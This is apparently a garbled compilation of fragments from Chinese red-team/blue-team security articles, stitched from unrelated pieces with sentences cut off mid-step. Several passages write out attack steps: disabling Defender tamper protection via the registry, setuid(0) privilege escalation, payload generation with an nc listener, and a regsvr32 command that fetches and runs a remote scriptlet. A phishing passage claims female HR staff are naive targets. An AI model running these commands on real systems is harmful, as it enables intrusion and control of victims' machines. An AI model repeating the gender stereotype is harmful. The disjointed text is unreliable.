转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口。
第二季 这次继续围绕第一篇,第一季关于后门: 《APT对抗(一) 红蓝对抗关于后门对抗》做整理与补充。再深入一步细化demo notepad++。 作为攻击者,要首先考虑到对抗成本,什么样的对抗成本。影响或阻碍对手方的核心利益。把概念加入到后门,更隐蔽,更长久。 文章的标题既然为APT对抗(二) 红蓝对抗关于后门对抗,那么文章的本质只做技术研究,Demo本身不具备攻击或者持续控制权限功能。
4.后门的几点特性 隐蔽,稳定,持久 一个优秀的后门,一定是具备几点特征的,无文件,无端口,无进程,无服务,无语言码,并且是量身目标制定且一般不具备通用性。 攻击者与防御者的本质对抗是什么? 增加对方在对抗中的时间成本,人力成本。 这里要引用百度对APT的解释: APT是指高级持续性威胁。 做为攻击者的对抗,无开放端口,无残留文件,无进程,无服务。在防御者处理完攻击事件后的一定时间内,再次激活。 5.后门的生成 大体分为四类: 1.有目标源码 2.无目标源码 3.无目标源码,有目标api 4.无目标源码,无api,得到相关漏洞等待触发 结合后门生成分类来举例细说几个demo。 第二季从防御者角度来对抗。 后者 的话 目前国内市场的全流量日志分析,由于受制于存储条件等因素,大部分为全流量,流量部分分析。
文|腾讯蓝军 jumbo 红蓝对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW、WAF、IDS、IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重。 但是,⼈永远是最⼤的弱点,在日渐增多的防护设备⾯前,钓⻥攻击(Phishing)已经成为对抗中⼀种必不可少且非常有效的攻击⼿法(近期也见到实际攻击中针对HR的邮件钓鱼攻击),一旦有人中招,攻击队就直接能进 我们讨论下,为什么简历投递钓鱼在腾讯蓝军的远程办公安全演习、其他红蓝对抗项目中效果出类拔萃呢? 首先,HR大多数是女生,女生比较善良、不设防,又非技术人员,这两者组合在一起,绝对是属于安全意识最薄弱的人之一了; 4、简历拥有分发属性。
#查看版本 dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b #查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭 "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4
可以使用setuid(附录4)使得bash当前Effective UID和Real UID相同来达到提权效果: #include<stdlib.h> main() { setuid(0); system 下面是抓取http数据包的命令示例 tcpdump -s 0 -A 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420 or tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' 5.2 网站文件 除了使用抓包工具去进行敏感信息的抓取,我们还可以在网站本身去做一下手脚。 腾讯蓝军也会持续和大家分享更多攻防知识,希望能够和大家共同成长,提高整体红蓝对抗水平。 文中涉及的技术信息,只限用于技术交流,切勿用于非法用途。欢迎探讨交流,行文仓促,不足之处,敬请不吝批评指正。 【附录】 附录1 红蓝对抗之windows内网渗透 附录2 pspy: https://github.com/DominicBreuker/pspy 附录3 bash: https://Linux.die.net
如果你想看关于Red Team的秘密 请继续往下翻哦 Red Team首次公开部分红蓝对抗框架 公开内容共分14个模块 准备钓鱼攻击 发送钓鱼邮件 发送payload 运行payload命令 维持本地持久化 常见的蓝队侦查和预防控制 ? 02 发送钓鱼邮件(到目标组织员工邮箱地址) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 05 维持本地持久化(在目标组织员工系统上) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 08 执行本地侦察/发现(在员工系统上) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ? 常见的蓝队侦查和预防控制 ? 11 升级域权限(通过常见的载体) 常见的红队攻击向量和技术 ? 常见的蓝队侦查和预防控制 ?
false exploit -j -z Step 3:使用python启动一个简易的Web服务器用于托管shell.exe python2 -m SimpleHTTPServer 1234 Step 4: cmd" -f msi > evil.msi Step 2:使用python开启一个简易的web服务器用于托管msi载荷 Step 3:在攻击主机上使用nc监听端口 nc -lvp 6666 Step 4: catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Step 4: Step 3:将上述命令复制到目标主机上执行 regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll Step 4: LPORT=4444 -f exe >shell.exe Step 2:启动MSF框架并设置监听 Step 3:将shell.exe文件传送到Windows Server 2008 R2的c盘 Step 4:
github.com/1in9e/gosint 分布式资产信息收集和漏洞扫描平台 ApolloScanner https://github.com/b0bac/ApolloScanner 自动化巡航扫描框架(可用于红队打点评估 yujian.html 御剑 使用GoLang开发的目录/子域扫描器 https://github.com/ReddyyZ/urlbrute urlbrute 指纹识别工具 项目简介 项目地址 项目名称 红队重点攻击系统指纹探测工具 Whatweb Golang实现Wappalyzer 指纹识别 https://github.com/projectdiscovery/wappalyzergo wappalyzergo 一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具 burpFakeIP burpFakeIP 自动发送请求 https://github.com/nccgroup/AutoRepeater AutoRepeater Hack-Tools 适用于红队的浏览器扩展插件 github.com/Summer177/seeyon_exp seeyon_exp 通达OA综合利用工具 https://github.com/xinyu2428/TDOA_RCE TDOA_RCE 蓝凌
视频内容 红蓝对抗之域渗透技巧 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。 如有需要查看超清1080P版视频,可以选用以下2种方式进行查看。
文|作者:腾讯企业IT部 安全运营中心 yyf 编者按 近源渗透(物理渗透)是红蓝对抗演练中的一个关键点,从相关新闻及实际测试结果来看,许多企业线上部署各种安全设备严阵以待,结果马奇诺防线在线下被物理渗透绕过 一、什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在红蓝对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望红蓝对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。
红蓝对抗之Windows内网渗透 作者 jumbo@腾讯蓝军 前言 无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。 而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。 [a2c8d1115ea079859458e4bab4adf4ea.png] [fc24d1ffc70e59ab15c69c7e7c718fa0.png] 攻击手法v1.1 既然我们能够让客户端下载我们的 同时预告一下,也算是立个flag:为了让红蓝对抗不用过于依靠个人经验和能力以及提升对抗效率,腾讯蓝军的红蓝对抗自动化工具平台正在筹建中,希望投入实战后有机会再跟大家一起交流学习。 Kerbrute: https://github.com/ropnop/kerbrute Responder: https://github.com/lgandx/Responder 相关阅读: 网络空间安全时代的红蓝对抗建设
4、强化主机安全防护 () 部分0day利用成功后需要主机读写文件权限,部署终端防护系统,一是监控非白名单地址的运维操作和敏感操作命令,及时发现异常命令执行行为,包括攻击者常用的whoami 、id等。 0信任安全网关 4.连环陷阱的apt攻击捕获战法 基于主动防御理念,利用 动态伪装和反向水坑,对抗0day高级攻击者。 4、基于行为维度分析 借助威胁情报检查流量中包含的挖矿、DDOS脚本排除代理、爬虫、黑产攻击ip。 7.基于威胁情报构筑动态防御体系 日常威胁情报收集、处理与建模主要采取以下几方面策略: 1、将安全设备收集到的报警按照攻击行为分为端口扫描类、服务探测类、尝试攻击类、恶意代码类,4类。 4、经汇总、筛选、清理,以攻击行为的响应时间、攻击间隔起止时间、顺序化的端口扫描列表、服务探测顺序、漏洞扫描顺序、恶意代码动作列表等维度,构建攻击特征数据库,形成威胁情报库。
一款CS后渗透模块插件,让大家使用一款插件就够了,本插件集大家之所长(其实就是重复造轮子了),本插件后期也会持续更新,欢迎各位老师关注!
01 什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 在信息安全领域中的红蓝对抗也是类似的思路,一方扮演黑客,另一方扮演防守者进行网络安全攻防演练。在演练过程中,蓝军模拟真实的攻击来评估企业现有防守体系的安全能力,红军对发现的问题做出相应的优化整改。 通过周期性的红蓝对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(红队)代表攻击方,Blue Team(蓝队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在红蓝对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望红蓝对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。
在红蓝对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。 我们也可以在本机设置socks4代理,指向我们vps的1080端口。 MS17-010 永恒之蓝在内网渗透中是屡试不爽的,基本上一打一大片。 但是MS17-010在实际红蓝对抗渗透中(通过代理打内网)并不好利用,MSF中自带的模块要打很多次才能成功一次,而且MSF自带的模块打sever2003的机器很容器蓝屏。 所以在真实红蓝对抗中不建议使用该漏洞,除非有百分百的把握能打成功 ? ? ?
[a-zA-Z]{3,4}\?\w{0,20}=\d{0,10} 由于该请求特征不明显,此正则会产生较多误报。 2、返回包状态码为200,返回内容必定是16位的密钥 ? 最后,RASP 可以对抗未知漏洞。发生攻击时,边界防护设备无法掌握应用下一步的动向。RASP 技术可以识别出异常的程序逻辑,比如反序列化漏洞导致的命令执行,因此可以对抗未知漏洞。 基于预先配置的规则,审核生成日志条目以记录尽可能多的关于系统上发生的事件信息,参考《另类WebShell监测机制–基于auditd》[4]思路。 0x04 总结 随着攻防对抗的不断升级,攻击方的手段越来越隐蔽,很多攻击流量都会进行加密,给防守方带来了较大挑战,相信后续对加密攻击流量检测的研究也会越来越多。 from=header [3] webdir+: https://scanner.baidu.com/#/pages/intro [4] 《另类WebShell监测机制–基于auditd》: https
MS08067红队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内容实战。 以下为第3期实战对抗报告:
谨以此文讨论一下在红蓝对抗场景下几个关键的技术点的二三事 ? 0x07攻防对抗 攻防对抗的场景下和传统的僵尸网络、木马、蠕虫病毒类的检测方法有相当大的差异性,主要表现在传统的恶意程序更多的趋向于自动化攻击,其攻击特点表现在比较固定利用的漏洞、EXP都相差无几且特征比较明显 攻防对抗的场景下的攻击手法,较多的利用了一些人的弱点一些弱口令、异常帐号登录、非法网络接入、敏感信息泄漏更多的是在一些行为上的特点,所以在识别恶意行为的时候更多的需要关注一些可疑的报警类型。 由于对抗场景下的很多行为也不是真正意义上的悄无声息,由于大多数攻击者对受害者网络里的业务逻辑并不是很熟悉,所以常常会出现很大层面的异常,这就埋下了被发现的隐患。 安全对抗的表面是攻击技术与检测防御的技术演进,本质是人与人之间的投入、技术的博弈。
红蓝对抗是最近很火的一个词,也是非常多小伙伴想要学习的技术方向,那么什么是红蓝对抗,如何学习? 这篇文章主要以老外整理的框架 ATT&CK 来看,我们如何学习红蓝对抗的技术,怎么提升自身的技术能力,更好的提升整体的安全能力。 4、硬件传播:提前给一些硬件做手脚,在将硬件插入设备时,释放恶意文件,达到获取权限的效果,成本和难度都比较高。 4、邮件、通讯历史记录,很多人喜欢将密码的敏感信息进行邮件传送,然后为了方便就把密码等敏感信息放在了邮件的 note 中,这也是一个很好的获取凭证的地方。 从学习技术的角度,按照 ATT&CK 的框架来学习攻击技术一定是可以的,但不一定在实际的攻防对抗中全部用到,可以优先选择最有效的技术点来学习,然后在实际的对抗中,遇到常规技术无法继续的时候,可以再去有针对性的学习其他的技术